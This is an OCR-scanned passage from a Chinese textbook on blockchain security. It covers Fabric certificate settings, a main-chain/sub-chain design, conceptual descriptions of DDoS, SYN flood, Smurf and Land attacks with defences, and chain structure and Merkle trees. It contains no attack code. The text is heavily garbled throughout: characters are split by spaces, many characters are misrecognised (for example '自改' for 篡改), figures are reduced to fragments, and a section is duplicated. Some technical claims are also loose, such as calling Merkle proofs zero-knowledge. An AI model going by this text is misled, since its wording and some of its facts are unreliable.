- CORE PEER TLS ROOTCERT FILE=/etc/hyperledger/fabric/tls/ca.crt 


指定 Peer 节点 的 msp 文 件 位 置 : 





— CORE PEER LOCALMSPID=OrglMSP 
— CORE PEER MSPCONFIGPATH=/var/hyperledger/fabric/msp 






































通过 以 上 用 户 / 节 点 的 注册 生成 MSP 和 TLS 证 书 ， 然 后 骨 把 证 书 分 发 到 各 节点 。MSP 证 书 用 于 网 络 中 的 身份 管理 ，TLS 证 书 保证 了 节点 之 间 的 安全 连接 。 实 际 应 用 中 ， 把 这 两 个 证 书 都 启用 ， 更 能 保证 
网 络 的 安全 性 。 


2. 复 杂 美 区 块 链 实现 与 安全 简 析 
(1) 区 块 链 实现 简介 


复杂 美的 区 块 链 系统 分 为 主 链 和 子 链 ， 主 链 提供 了 子 链 之 间 价 值 传递 的 路 由 功能 ， 可 以 实现 公有 链 、 联 盟 链 、 私 有 链 的 价值 交换 。 主 链 的 设计 尽 可 能 简单 ， 可 水 平 扩展 ; 子 链 的 设计 尽 可 能 功能 
一 。 比 如 实现 一 个 以 太 坊 智能 合约 功能 的 子 链 、 一 个 支持 比特 币 UTXO 模 型 的 子 链 等 ， 这 两 个 子 链 之 间 可 以 无 风险 地 交换 价值 。 


许可 子 链 可 以 通过 主 链 进行 信息 交互 。 在 复杂 美 区 块 链 系统 中 ， 一 条 许可 子 链 中 执行 的 交易 (根据 该 链 的 逻辑 ) 能 够 发送 到 另 一 条 许可 子 链 中 。 像 区 块 链 上 的 链 内 交易 一 样 ， 许 可 子 链 的 链 间 通 信 是 
完全 异步 的 ， 并 且 发 送 的 信息 不 能 返回 到 起 源 的 子 链 。 为 了 降低 实施 复杂 性 及 风险 ， 链 间 交 易 与 链 内 交易 拥有 相同 的 信息 类 型 。 交 易 具 有 起 始 段 ， 该 段 提供 许可 子 链 的 认证 以 及 任意 大 小 的 地 址 。 与 比特 
币 和 以 太 坊 系统 不 同 ， 链 间 交 易 不 会 产生 任何 类 型 的 支付 费用 。 为 确保 链 间 交易 的 正确 性 ， 复 杂 美 区 块 链 系 统 使 用 基于 Merkle 树 的 队列 机 制 。 主 链 将 源 许 可 子 链 输出 队列 上 的 交易 移动 到 目标 许可 子 链 的 
输入 队列 中 。 主 链 传 递 了 许可 子 链 的 交易 信息 ， 而 不 是 主 链 本 身 的 交易 信息 。 


(2) 区 块 链 安全 实现 介绍 


每 个 许可 子 链 都 须 以 自己 的 方式 为 链 上 的 用 户 定义 身份 。 该 方法 对 于 KYC (充分 了 解 你 的 客户 ) 以 及 设 定 访问 许可 子 链 的 资源 的 权限 是 必需 的 。 与 R3 Corda 或 Hyperledger Fabric 不 同 ， 复 杂 美 区 块 
链 系 统 不 使 用 单一 根 节点 CA 认证 ， 因 为 CA 认证 本 身 是 中 心 化 的 ， 而 中 心 化 很 容易 受到 攻击 。 它 允许 每 个 许可 块 链 拥有 自己 的 身份 及 访问 管理 。 例 如 ， 一 个 子 链 可 以 使 用 Microsoft Active Directory 来 管 
理 其 身份 ， 另 一 个 子 链 可 以 使 用 IBM LDAP 服 务 器 来 管理 其 身份 。 许 可 子 链 上 的 每 个 身份 都 在 主 链 上 有 一 个 对 应 的 独特 身份 。 从 子 链 可 以 推算 出 主 链 的 身份 |/D， 但 是 反 过 来 不 行 。 这 是 为 了 确保 子 链 上 用 
户 ID 的 隐私 ， 并 允许 主 链 对 子 链 用 户 1D 进 行 认证 。 


5.3 ”防御 DDoS 攻击 


知名 云 服 务 提供 商 Imperva Incapsula 发 布 了 一 份 名 为 《2017 年 三 季度 全 球 DDos 威 胁 情况 》 的 综合 报告 ， 其 中 显示 加 密 数字 货币 运营 商 和 比特 币 交 易 所 是 DDoS (Distributed Denial of Service) 攻 
击 最 多 的 目标 。 本 节 将 介绍 一 些 DDoS 的 攻击 形式 ， 以 及 区 块 链 网 络 如 何 应 对 DDoS 攻 击 。 


5.3.1 例 说 DDoS 攻击 危害 与 处 理 


1.DoS 攻 击 和 和 DDoS 攻击 


Dos (Denial of service， 拒 绝 服 务 ) 是 一 种 中 断 类 型 攻击 。 几 乎 所 有 的 攻击 ， 只 要 目的 是 阻碍 可 用 性 的 都 可 以 归 类 为 Dos 攻 击 。DoS 攻 击 可 以 通过 破坏 物理 网 络 组 件 ， 消 耗 存 储 、 珊 宽 或 计算 资源 ， 
阻塞 通信 ， 干 扰 配置 和 状态 信息 等 ， 来 破坏 服务 或 使 服务 质量 降低 。 比 如 ，Dos 攻 击 者 使 用 恶意 软件 使 节点 的 CPU 时 间 达 到 极限 或 通过 触发 错误 指令 来 使 系统 衣 省 等 。 


P2P 网 络 的 开放 性 会 导致 DDoS 攻 击 ， 处 于 网 络 中 不 同位 置 的 节点 共同 发 起 DoS 攻 击 来 阻碍 系统 正常 运行 。 比 如 ， 攻 击 者 注册 到 P2P 网 络 中 ， 获 得 访问 多 个 对 等 节点 的 权限 ， 并 在 这 些 节点 植 入 僵尸 进 
程 ， 在 指定 的 时 间 内 ， 启 动 所 有 进程 来 对 目标 设备 发 起 攻击 。 攻 击 者 和 大 量 僵 尸 进程 一 起 协作 ， 使 受害 节点 的 网 络 带 宽 很 容易 被 耗 尽 ;扰乱 合法 的 发 送 节 点 和 接收 节点 之 间 的 通信 ， 阻 止 访问 特定 的 节点 
或 服务 。 图 5-7 演 示 了 一 个 简单 的 DDoS 攻 击 流程 ， 攻 击 者 通过 大 量 僵尸 节点 向 受害 节点 发 送 海 量 数据 包 来 达到 拒绝 服务 攻击 。DDoS 攻 击 又 可 以 分 为 带宽 攻击 、 协 议 攻 击 (包括 Smurf 攻 击 、UDP 攻 击 、 
ICMP 攻 击 、SYN 攻 击 、 使 用 DNS 系 统 攻击 、CGI 请 求 攻击 等 ) 、 软 件 漏洞 攻击 等 。 







僵尸 节点 僵尸 市 点 





被 攻击 玫 操 





图 5-7 ”DDoS 攻击 示意 图 


2.DDoS 攻 击 形式 
1) 带宽 攻击 


带宽 攻击 是 使 受害 节点 的 网 络 带 宽 耗 尽 ， 以 达到 拒绝 服务 的 目的 。 目 前 联盟 链 场景 下 使 用 的 共识 协议 通常 是 PBFT (Practical Byzantine Eault Tolerance， 实 用 拜占庭 容 储 算法 ) 或 是 它 的 一 些 演进 
版 本 ,其 本 质 就 是 节点 在 多 播 的 过 程 中 投票 。 从 图 5-8 中 可 以 看 出 随 着 节点 数 的 增加 ， 共 识 过 程 中 的 消息 数目 也 会 线性 增长 。 


pre-prepare ， prepare commit ， reply 


预 处 理 ， 准备 ' 提交 ' 返回 


request 


请 求 





图 5-8 PBFT 协 议 流程 


图 5-9 所 示 为 某 区 块 链 平台 在 交易 并 发 测试 过 程 中 节点 端口 的 上 下 行 流量 监控 。 测 试 的 网 络 环境 为 干 兆 网 络 ， 区 块 链 平台 采用 的 共识 协议 是 PBFT， 总 共 部 署 16 个 物理 节点 ， 交 易 的 并 发 量 是 每 秒 
10000 笔 交易 ， 每 笔 交 易 的 大 小 为 250 字 节 。 图 5-9 所 示 是 其 中 一 个 节点 上 的 监控 。 可 以 看 到 ， 在 共识 期 间 ， 网 络 输入 (Network In) 和 网 络 输出 (Network Out) 带宽 都 已 经 冲 过 900M ， 节 点 的 网 络 端 
口 负荷 已 经 非常 重 了 。 如 果 在 这 个 时 候 对 某 个 节点 发 起 DDoS 珊 宽 攻 击 ， 可 能 只 需要 比较 少 的 代价 就 能 使 该 节点 的 网 络 资 源 耗 尽 。 根 据 PBFT 协 议定 义 ， 如 果 16 个 节点 中 有 超过 5 个 节点 被 DDos 攻 击 成 功 导 
致 节点 无 可 用 网 络 融 宽 对 请 求 作出 响应 ， 那 么 共识 就 无 法 达成 。 


13:00 L331 13:30 13:45 
时 CPUUtlllization 国 Networkn 大 NetworkOut 


-- 13:00 13:15 13:30 13:45 
3 CPUUtllization Networkln BB NetworkOut 


图 5-9 节点 流量 监控 
2) 软件 漏洞 攻击 


软件 漏洞 攻击 是 指 攻击 者 利用 软件 程序 的 设计 缺陷 或 漏洞 来 进行 攻击 。 软 件 漏洞 可 能 存在 于 软件 设计 、 开 发 或 配置 过 程 中 。2016 年 由 于 The Dao 事 件 硬 分 叉 出 来 的 以 太 坊 (ETH) 由 于 软件 设计 中 的 
一 个 漏洞 被 攻击 者 利用 ， 导 致 以 太 坊 遭 受 了 DDoS 攻 击 。 在 以 太 坊 网 络 上 发 送 一 笔 交 易 (比如 转账 ) ， 需 要 向 矿工 支付 一 定 的 手续 费 ， 矿 工 一 般 都 会 优先 打包 手续 费 高 的 交易 ， 如 果 手 续费 比较 低 或 不 支付 
手续 费 ， 那 么 这 笔 交 易 可 能 需要 等 待 很 久 才 能 被 打包 。 以 太 坊 网 络 手续 费 是 由 gasPrice*gasUsed (Gas 可 以 理解 为 “燃料 ”， 每 执行 一 条 合约 指令 会 消耗 一 定 的 “燃料 ”。 当 某 笔 交易 还 未 执行 结束 ， 而 
燃料 消耗 完 时 合约 执行 终止 并 回 滚 状 态 ) 计算 得 到 。gasPrice 由 交易 发 起 者 来 设置 ，gasUsed 是 由 交易 或 智能 合约 的 计算 量 来 决定 的 。 如 图 5-10 所 示 是 不 同 的 操作 码 需要 消耗 的 Gas 量 [1]。 此 次 DDoS 攻击 
中 ， 攻 击 者 利用 了 一 个 名 为 EXTCODESIZE 的 操作 码 。 由 于 执行 它 只 需 消耗 非常 少 的 Gas， 所 以 攻击 者 能 够 以 比较 低 的 成 本 来 反复 调用 此 操作 (每 个 区 块 50000 次 的 频率 ) ， 导 致 矿工 处 理 区 块 的 效率 显著 
下 降 (需要 20 ~ 60 秒 左右 才能 处 理 完 一 个 区 块 ) 。 


put Into permanent storage 


um as 





图 5-10 ”操作 码 对 应 的 Gas 量 


3) SYN Flooding 攻 击 


SYN Flooding 攻 击 是 指 恶意 客户 端 发 送 大 量 TCP/SYN 包 ， 并 且 以 一 个 假 的 发 送 方 地 址 发 送 到 目标 主机 ， 以 消耗 目标 主机 的 大 量 资源 。 客 户 端 和 目标 主机 建立 TCP 连 接 时 ， 先 发 送 SYN 报 文 ， 目 标 主机 
发 回 一 个 TCP/SYN-ACK 报 文 并 等 待 TCP/ACK 响 应 报 文 ， 由 于 发 送 地 址 是 假 的， 所 以 ACK 报 文 永远 不 会 到 来 ， 这 样 就 建立 了 一 个 半 开 的 连接 。 由 于 存在 大 量 的 这 种 半 开 的 连接 ， 叶 致 目标 主机 的 TCP 资 源 
枯竭 ， 正 常 连 接 无 法 接 入 。 图 5-11 展 示 了 TCP SYN Flooding 攻 击 流程 : 


TCP 三 次 握手 TCP SYN Flooding 攻 击 
客户 应 目标 节点 “客户 冰 目标 耶 点 


TCP SYN 报 文 





TCP SYN ACK 报 文 





由 于 发 送 地 址 是 假 的 ， 
所 以 不 会 有 响应 消息 ， 
等 待 响应 


啊 应 超时 


TCP ACK 报 文 





图 5-11 TCP SYN Flooding 攻 击 流程 图 
4) Smurf 攻 击 


Smurf 攻 击 利 用 发 送 ICMP 应 答 包 使 目标 主机 拒绝 服务 。Smurf 攻 击 中 ，ICMP 应 答 请 求 数据 包 中 的 目标 |P 是 一 个 网 络 的 广播 IP 地 址 ， 源 IP 地 址 就 是 其 要 攻击 的 I|P 地 址 。 这 种 攻击 方式 由 3 部 分 组 成 : 攻 
击 者 、 中 间 节 点 (路 由 器 、 交 换 机 、 主 机 等 ) 和 被 攻击 者 。 攻 击 者 发 送 一 个 |CMP 请 求 应 答 包 ， 中 间 节 点 向 源 IP (被 攻击 者 ) 发 送 一 个 ICMP 应 答 包 。 当 网 络 中 大 量 的 中 间 节 点 对 同一 个 源 |P 发 送 应 答 包 
时 ， 就 会 引起 网 络 阻塞 ， 导 致 拒绝 服务 。 


5) Land 攻 击 


在 Land 攻 击 中 ， 攻 击 者 向 目标 系统 发 送 大 量 源 地 址 和 目标 地 址 相同 的 包 。 目 标 系统 接收 到 包 后 ， 向 包 中 的 目标 地 址 (本 身 ) 发 送 SYN-ACK 包 ， 收 到 这 个 包 后 再 向 “目的 地 址 ”发 送 ACK， 并 创建 一 个 
空 连接 ， 从 而 使 目标 系统 在 解析 包 时 占用 大 量 系统 资源 ， 严 重 情 况 下 将 导致 目标 系统 瘫痪 。 图 5-12 展 示 了 Land 攻 击 流程 。 


[1] https://docs.google.com/spreadsheets/d/1m89CVujrQeSLAFJ8-YAUCcNK950dUzMQPMJBxRtGCqs/edit# gid=0。 


5.3.2 ”区 块 链 网 络 如 何 防御 DDoS 攻 击 


DDoS 攻 击 通 常 是 集中 火力 攻击 单个 节点 或 少 部 分 节点 ， 这 种 攻击 方式 对 区 块 链 这 种 不 依赖 于 某 个 特定 中 心 节点 的 网 络 ， 能 产生 一 定 的 负面 影响 ， 但 是 并 不 是 致命 的 。 攻 击 者 付出 一 定 代价 ,最 多 只 能 
让 网 络 中 某 个 节点 或 少量 节点 离线 ， 而 整个 区 块 链 网 络 依然 能 正常 工作 ， 而 且 当 离线 节点 重新 恢复 上 线 后 依然 能 同步 区 块 信息 并 重新 参与 到 工作 中 。 比 如 ， 公 开 的 比特 币 网 络 经 常会 遭受 这 类 攻击 。2016 
年 某 组 织 向 比特 币 网 络 发 送 大 量 的 垃圾 交易 ， 交 易 数 量 多 达 88000 笔 ， 垃 圾 交易 占用 部 分 节点 客户 端的 内 存 高 达 1GB， 导 致 一 部 分 硬件 配置 较 低 的 节点 无 法 正常 处 理 交 易 而 被 动 离 线 (节点 响应 太 慢 ,会 被 
比特 币 网 络 判定 为 无 效 节 点 ) 。 事 后 开发 人 员 做 了 紧急 修复 ， 对 节点 进行 调整 ， 让 它 对 低 于 一 定 手 续费 的 交易 进行 去 章 。 类 似 的 事件 也 在 以 太 坊 网 络 中 发 生 过 ， 攻 击 者 利用 一 个 Gas 值 非常 低 的 操作 码 ， 发 
送 大 量 垃圾 交易 ， 占 用 了 部 分 节点 的 大 量 资源 ， 导 致 这 些 节点 无 法 正常 处 理 交 易 。 对 此 开发 者 调 高 了 这 个 操作 码 的 Gas 值 ， 从 而 使 攻击 成 本 大 大 增加 。 在 攻击 过 程 中 ， 虽 然 比特 币 或 以 太 坊 网 络 都 受到 了 些 
影响 ， 但 是 并 没有 发 生 整 个 网 络 中 断 而 导致 拒绝 服务 。 


正常 情况 Land 攻 击 
源 主机 目标 主机 源 主机 


SYN 包 SYN 包 


由 于 目标 地 址 和 
源 地 址 相同 ， 
SYN-ACK 包 和 
ACK 包 
包 ACK 包 都 是 发 给 自身。 


图 5-12” Land 攻击 流程 图 


而 联盟 链 除了 上 述 特点 ， 可 以 采用 通用 的 网 络 解决 方案 (比如 SSLTLs 等 ) ; 引入 严格 的 准 入 机 制 ， 贷 起 第 一 道 安 全 防线 ; 提供 节点 监控 功能 ， 查 看 是 否 有 可 疑 流量 激增 行为 ， 并 能 够 提前 预警 早 作 分 
析 ; 添加 过 滤 规则 ， 过 滤 从 可 疑 来 源 过 来 的 数据 包 ; 节点 上 安装 第 三 方 防 御 软 件 ， 另 外 通过 建立 节点 信誉 度 、 黑 名 单机 制 等 手段 来 加 强 网 络 安全 。 


针对 区 块 链 的 安全 ， 还 应 该 重点 考虑 区 块 链 钱包 /客户 端 安全 、 智 能 合约 安全 ， 以 及 交易 平台 的 安全 、 夏 池 的 安全 等 。 比 如 ，2016 年 6 月 比特 币 钱包 BitGo 遭 遇 了 大 规模 的 DDoS 攻击 ， 服 务 器 瘫痪 ， 导 
致 期 间 用 户 无 法 进行 交易 ; 2017 年 5 月 比特 币 交 易 所 P 网 遭遇 严重 的 DDo9 攻 击 ， 导 致 大 量 用 户 无 法 正常 访问 网 站 ; 2017 年 7 月 鱼池 F2Pool 遭 遇 非法 DDoS 攻击 ， 矿 工 挖 矿 受 到 影响 ， 以 太 坊 钱包 Geth 内 人 存 


问题 引起 客户 端 朋 溃 ， 叶 致 区 块 同步 时 间 增 加 。 


安全 性 的 保障 并 不 能 仪 仪 依靠 技术 手段 。 


5.4 ”本 童 小 结 


网 络 层 安全 是 计算 机 科学 技术 中 一 个 十 分 重要 的 领域 。 随 着 基于 P2P 网 络 的 区 块 链 技术 及 应 用 不 断 地 发 展 ， 网 络 层 安全 控制 也 显得 越发 重要 。 
本 章 主要 介绍 了 区 块 链 网 络 层 安全 与 控制 的 一 些 基础 知识 和 区 块 链 实践 中 的 一 些 P2P 加 密 应 用 ， 包 括 Atation-to-Station 协 议 、 闪 电网 络 中 的 Sphinx 协 议 等 。 


通过 本 章 的 介绍 ， 读 者 可 以 对 区 块 链 的 网 络 层 安 全 有 一 个 比较 初步 的 了 解 ， 然 后 随 着 区 块 链 的 发 展 ， 在 实际 应 用 中 不 断 总 结 并 提高 。 


第 6 草 ”数据 层 与 共识 安全 


6.1 ”区 块 链 数据 加 密 技术 的 应 用 


加 密 技术 和 密码 学 的 发 展 是 区 块 链 的 基石 。 就 加 密 技术 的 种 类 而 言 ， 可 以 分 为 哈 希 运算 、 对 称 加 密 、 非 对 称 加 密 ， 以 及 在 非 对 称 加 密 的 基础 上 衍生 而 来 的 数字 签名 技术 等 。 哈 希 运 算 保 证 了 数据 的 一 
致 性 和 不 可 自 改 性 ， 非 对 称 加 密 保证 了 交易 的 可 靠 性 。 可 以 这 么 说 ， 如 果 没 有 密码 学 ， 就 不 会 出 现 区 块 链 。 数 据 加 密 技术 的 详细 介绍 参见 第 1 章 。 区 块 链 就 是 利用 这 些 加 密 技术 形成 了 其 独一无二 的 链 式 结 
构 。 另 外 ， 结 合 分 布 式 架构 、 节 点 全 量 数据 备份 与 共识 技术 保证 了 上 链 数 据 的 安全 性 。 安 全 性 主要 体现 在 只 有 数据 的 拥有 者 才能 改动 数据 ， 某 个 节点 或 者 某 个 比例 的 节点 数据 被 自 改 或 者 收 到 攻击 ， 将 不 


会 影响 整个 系统 的 数据 一 致 性 。 关 于 加 密 技 术 如 何 让 区 块 链 产生 链 式 结构 以 及 如 何 保证 交易 的 唯一 性 ， 下 面 将 详细 讲述 。 


第 6 草 ”数据 层 与 共识 安全 


6.1 ”区 块 链 数据 加 密 技术 的 应 用 


加 密 技术 和 密码 学 的 发 展 是 区 块 链 的 基石 。 就 加 密 技术 的 种 类 而 言 ， 可 以 分 为 哈 希 运算 、 对 称 加 密 、 非 对 称 加 密 ， 以 及 在 非 对 称 加 密 的 基础 上 衍生 而 来 的 数字 签名 技术 等 。 哈 希 运 算 保 证 了 数据 的 一 


致 性 和 不 可 自 改 性 ， 非 对 称 加 密 保证 了 交易 的 可 靠 性 。 可 以 这 么 说 ， 如 果 没 有 密码 学 ， 就 不 会 出 现 区 块 链 。 数 据 加 密 技术 的 详细 介绍 参见 第 1 章 。 区 块 链 就 是 利用 这 些 加 密 技术 形成 了 其 独一无二 的 链 式 结 
构 。 另 外 ， 结 合 分 布 式 架构 、 节 点 全 量 数据 备份 与 共识 技术 保证 了 上 链 数 据 的 安全 性 。 安 全 性 主要 体现 在 只 有 数据 的 拥有 者 才能 改动 数据 ， 某 个 节点 或 者 某 个 比例 的 节点 数据 被 自 改 或 者 收 到 攻击 ， 将 不 


会 影响 整个 系统 的 数据 一 致 性 。 关 于 加 密 技 术 如 何 让 区 块 链 产生 链 式 结构 以 及 如 何 保证 交易 的 唯一 性 ， 下 面 将 详细 讲述 。 


姜 厅 / 


6.1.1 如 何 使 用 这 些 加 密 技术 形成 区 块 链 


1. 链 式 结构 


区 块 链 是 一 种 分 布 式 共 识 系统 。 在 区 块 链 系统 中 ， 所 有 的 参与 节点 将 就 交易 的 状态 达成 一 致 。 


可 以 把 区 块 链 理解 成 一 种 分 布 式 的 交易 的 共享 账本 。 交 易 信息 将 被 整理 并 打包 记录 在 区 块 中 。 区 块 链 是 一 种 数据 结构 ， 这 种 结构 的 数据 可 以 看 成 是 一 系列 链接 的 队列 ， 这 些 队 列 通 过 哈 希 指针 进行 天 


前 一 区 块 哈 希 


联 (与 传统 意义 上 的 普通 指针 要 区 分 开 ， 哈 希 指 针 用 来 指向 前 一 个 区 块 ) 。 通 用 区 块 链 的 结构 如 图 6-1 所 示 。 


前 一 区 块 哈 希 中 ”前 一 区 块 哈 希 


交易 和 其 他 数据 


交易 和 其 他 数据 交易 和 其 他 数据 


(Genesls Block) 





图 6-1 区 块 链 结 构 


不 同 的 区 块 链 技术 ， 数 据 结构 不 同 ， 内 部 用 到 的 一 些 加 密 技术 也 不 同 。 下 面 列举 一 些 典 型 区 块 链 的 数据 结构 ， 并 进一步 阐述 区 块 链 技术 如 何 通 过 链 式 技术 来 防止 数据 被 自 改 ， 从 而 保证 数据 的 安全 
性 ; 


比特 币 的 结构 如 图 6-2 所 示 。 


Block 1 Block 2 Block 3 
Header Header Header 


前 一 区 块头 的 哈 希 前 一 区 块头 的 哈 希 | 前 一 区 块头 的 哈 希 


Merkle Root Merkle Root Merkle Root 


Block 1 Block 2 Block 3 
Transactions Transactions Transactions 





图 6-2 ”比特 币 结 构 


在 图 6-2 所 示 比 特 币 的 区 块 链 中 ， 一 个 区 块 中 含有 一 笔 或 多 笔 新 的 交易 ， 它 们 存放 在 区 块 的 交易 数据 部 分 中 。 对 于 每 笔 交 易 的 副本 都 进行 Hash 运 算 ， 进 而 得 到 一 个 Hash 值 。 每 两 个 Hash 值 组 成 一 对 ， 
再 进行 Hash 运 算 。 如 此 往复 ， 最 后 得 到 一 个 单一 的 Hash 值 。 这 个 Hash 值 称 作 Merkle 树 的 根 。 


Merkle 树 的 根 存放 在 区 块头 中 ， 每 个 区 块 同样 也 存储 了 前 一 个 区 块头 的 Hash 值 ， 区 块 链 通过 这 种 方式 将 所 有 的 区 块 链接 到 了 一 起 。 这 种 链 式 结构 保证 了 任何 一 笔 处 于 区 块 中 的 交易 不 可 能 被 随意 改 
动 。 如 果 想 改动 区 块 中 的 一 笔 交 易 信息 ， 必 然 要 改动 这 个 区 块 之 后 的 所 有 区 块 的 内 容 。 


从 数据 安全 角度 讲 ， 某 个 攻击 者 想 自 改 某 笔 交 易 信息 ， 并 将 之 成 功 地 存 入 区 块 链 中 ， 需 要 找到 存放 该 交易 记录 的 区 块 ， 然 后 对 该 交易 记录 进行 更 改 。 一 旦 区 块 的 内 容 更 改 ， 区 块头 中 存储 的 Hash 值 就 
会 随 之 改变 ， 因 为 后 续 所 有 区 块 中 的 所 有 区 块头 Hash 值 都 是 以 此 为 基础 进行 PoW 共 识 计算 的 。 由 此 可 知 ， 如 果 想 单独 修改 某 个 区 块 中 的 某 条 信息 而 不 改变 后 续 区 块 中 的 信息 是 不 可 能 的 ， 而 修改 后 续 所 有 
区 块 中 的 信息 付出 的 代价 将 是 巨大 的 ， 甚 至 不 可 能 。 


在 图 6-3 中 展示 了 一 个 广义 区 块 链 所 必须 具有 的 数据 结构 。 虽 然 现在 各 种 区 块 链 实现 技术 层出不穷 ， 但 都 必须 借助 这 样 的 链 式 数据 结构 ， 以 及 区 块头 中 的 Merkle 树 等 结构 来 保证 本 块 中 保存 的 交易 信 
息 没 有 被 算 改 过 ， 而 且 本 块 之 前 所 有 的 交易 信息 都 是 安全 可 靠 的 ， 都 没有 被 自 改 过 。Merkle 树 主要 用 来 验证 收 到 的 区 块 中 存放 的 主体 的 交易 信息 是 否 被 改动 过 ， 而 区 块头 中 存储 的 前 一 个 区 块 的 Hash 值 则 
可 以 保证 之 前 所 有 区 块 的 信息 都 没有 被 改动 过 。 
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图 6-3 ”广义 区 块 链 结构 


2. 块 的 构成 


区 块 链 中 区 块 的 数据 结构 主要 由 区 块头 和 区 块 体 组 成 。 在 区 块头 中 主要 存储 的 是 该 区 块 的 一 些 基本 信息 和 验证 信息 ， 比 如 区 块 生成 的 信息 、 区 块 的 大 小 、 区 块 里 所 有 交易 生成 的 Merkle 树 、 前 一 个 区 
块 的 Hash 值 ， 以 及 本 区 块 内 容 加 上 前 一 区 块 Hash 值 所 生成 的 本 区 块 的 哈 希 值 。 比 特 币 区 块 结构 如 表 6-1 所 示 。 


表 6-1 比特 币 区 块 结 构 


字 说 

4 用 字 节 表示 的 该 字段 之 后 的 区 块 大 小 

8 组 成 区 块头 的 几 个 字段 

1 一 9 该 区 块 包含 的 交易 数量 ， 包 含 coinbase 交易 

记录 在 区 块 里 的 交易 信息 ， 使 用 原生 的 交易 信息 格式 ， 并 且 交 易 在 数 
据 流 中 的 位 置 必须 与 Merkle 树 的 叶子 节点 顺序 一 致 





另外 值得 一 提 的 是 ， 比 特 币 的 区 块 大 小 目前 严格 限制 在 1MB 以 内 (4 字 节 的 “区 块 大 小 ”字段 不 包含 在 此 内 ) 。 


3.Merkle 树 的 构建 


是 其 两 个 子 节点 内 容 的 哈 希 值 ， 根 节点 也 由 其 两 个 子 节点 内 容 的 哈 希 值 组 成 。 进 一 步 ，Merkle 树 可 以 推广 到 多 又 树 的 情形 。 
Merkle 树 的 特点 是 ， 底 层 数 据 的 任何 变动 都 会 传递 到 其 父 节点 ， 一 直到 树 根 。 
Merkle 树 的 典型 应 用 场景 包括 以 下 几 种 ， 还 以 图 6-4 所 示 的 Merkle 树 为 例 。 
1) 快速 比较 大 量 数据 : 当 两 个 Merkle 树 根 相同 时 ， 则 意味 着 所 代表 的 数据 必然 相同 。 
2) 快速 定位 修改 : 在 图 6-4 中 ， 如 果 D1 中 数据 被 修改 ， 会 影响 到 N1、N4 和 Root。 因 此 ， 沿 着 Root 一 N4 一 N1， 可 以 快速 定位 到 发 生 改 变 的 D1。 


3) 零 知 识 证 明 : 例如 ， 如 何 证 明 某 个 数据 (D0..….D3) 中 包括 给 定 内 容 D0? 很 简单 ， 构 造 一 棵 Merkle 树 ， 公 布 N0、N1、N4、Root 和 D0 拥有 者 ， 可 以 很 容易 检测 DO 是 否 存 在 ， 但 不 知道 其 他 内 


| 


功 
1 
oo 


区 块 链 正 是 利用 了 Merkle 树 可 快速 比较 大 量 数据 的 特点 ， 能 够 快速 地 验证 其 他 节点 相同 区 块 里 包含 的 交易 内 容 是 否 与 本 区 块 里 包含 的 交易 内 容 完全 一 致 。 无 须 逐 条 比 对 交易 内 容 ， 只 需 比较 两 个 区 块 
中 的 Merkle 树 是 否 一 致 即 可 。 这 就 极 大 地 保证 了 数据 的 安全 性 、 唯 一 性 和 不 可 算 改 性 ， 大 大 提高 了 大 量 数据 验 同 的 效率 。 
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图 6-4 Metkle 树 


6.1.2 ”安全 性 阐述 


1. 链 式 结构 如 何 保证 数据 的 可 追溯 和 不 可 自 改 


链 式 结构 确保 了 存放 在 区 块 链 中 的 数据 具备 可 追溯 性 和 不 可 算 改 性 。 以 比特 币 为 例 ， 我 们 知道 比特 币 的 矿工 为 了 争取 到 一 定 的 奖励 以 及 交易 费 ， 需 要 争 抢 记 账 权 。 他 们 需要 解 开 一 道 难 题 (公认 的 没 
有 捷径 ， 只 能 通过 逐步 匹配 的 方法 来 完成 ) 一 一 找到 一 个 随机 数 ， 使 得 Hash 的 结果 符合 要 求 。 当 然 这 道 难题 的 难度 是 可 调节 的 ， 随 着 算 力 增加 难题 的 难度 将 不 断 增加 ， 反 之 亦 然 。 其 目的 是 让 每 次 难题 被 
解 开平 均 需要 10 分 钟 ， 从 而 控制 区 块 生成 的 时 间 。 


每 隔 10 分 钟 ， 如 果 某 个 矿工 算出 了 答案 (一 般 是 拥有 强大 算 力 的 ) ， 会 立刻 把 10 分 钟 里 收 到 的 交易 汇总 起 来 ， 加 上 时 间 戳 信息 以 及 和 他 算出 的 这 个 答案 ， 共 同 组 成 一 个 数据 区 块 (Block) ， 然 后 向 
全 网 广播 。 其 他 矿工 收 到 之 后 ， 如 果 验 证 得 知 他 的 答案 正确 ， 区 块 里 的 交易 数据 都 合法 ， 那 么 就 会 把 这 个 区 块 加 入 自己 的 账本 中 。 此 后 ， 这 个 区 块 在 系统 里 永远 存在 ， 且 不 可 修改 。 


这 个 区 块 里 还 有 两 条 非常 关键 的 信息 : 本 区 块 的 Hash 值 以 及 本 区 块 承接 的 上 一 个 区 块 的 Hash 值 。 每 一 个 区 块 的 Hash 值 都 是 唯一 的 ， 因 此 每 一 个 区 块 都 独一无二 ， 并 且 都 指向 它 的 上 一 个 区 块 ， 如 图 
6-5 所 示 。 





图 6-5 链 式 结构 


于 是 ， 所 有 的 区 块 (Block) 形成 了 一 条 链 (Chain) ， 这 就 是 区 块 链 这 个 名 字 的 由 来 。 所 有 的 区 块 都 是 有 来 源 的， 最 后 都 能 够 追溯 到 创始 区 块 (Genesis Block) ， 也 就 是 中 本 聪 创造 比特 币 的 那个 


区 块 。 不 仅 如 此 ， 在 区 块 中 记录 的 每 一 笔 交 易 也 有 类 似 的 结构 。 在 进行 交易 时 ， 比 如 A 给 B 10 个 比特 币 ， 这 笔 交 易 会 有 一 个 唯 的 Hash 值 ， 并 且 要 说 明 这 10 个 比特 币 是 从 哪里 来 的 、 那 笔 交 易 的 Hash 值 。 


结果 就 是 ， 每 一 个 比特 币 也 都 是 唯 - 的， 其 来 源 可 以 一 直 向 上 追溯 ， 最 终 追 溯 到 中 本 聪 的 创始 比特 币 或 者 哪 位 矿工 挖 矿 被 系统 奖励 的 比特 币 ， 所 有 的 历史 都 被 清 清楚 林地 记录 。 这 和 我 们 目前 使 用 的 货币 


是 有 很 大 区 别 的 。 目 前 情况 是 ， 如 果 A 给 了 C 10 万 元 ，B 也 给 了 C 10 万 元 ， 然 后 C 给 了 D 5 万 元 ， 那 么 这 笔 5 万 元 是 A 给 他 的 呢 ， 还 是 B 给 他 的 呢 ， 还 是 C 本 来 就 有 的 呢 ? 分 不 清 。 又 比如 A 的 10 万 元 可 能 来 历 


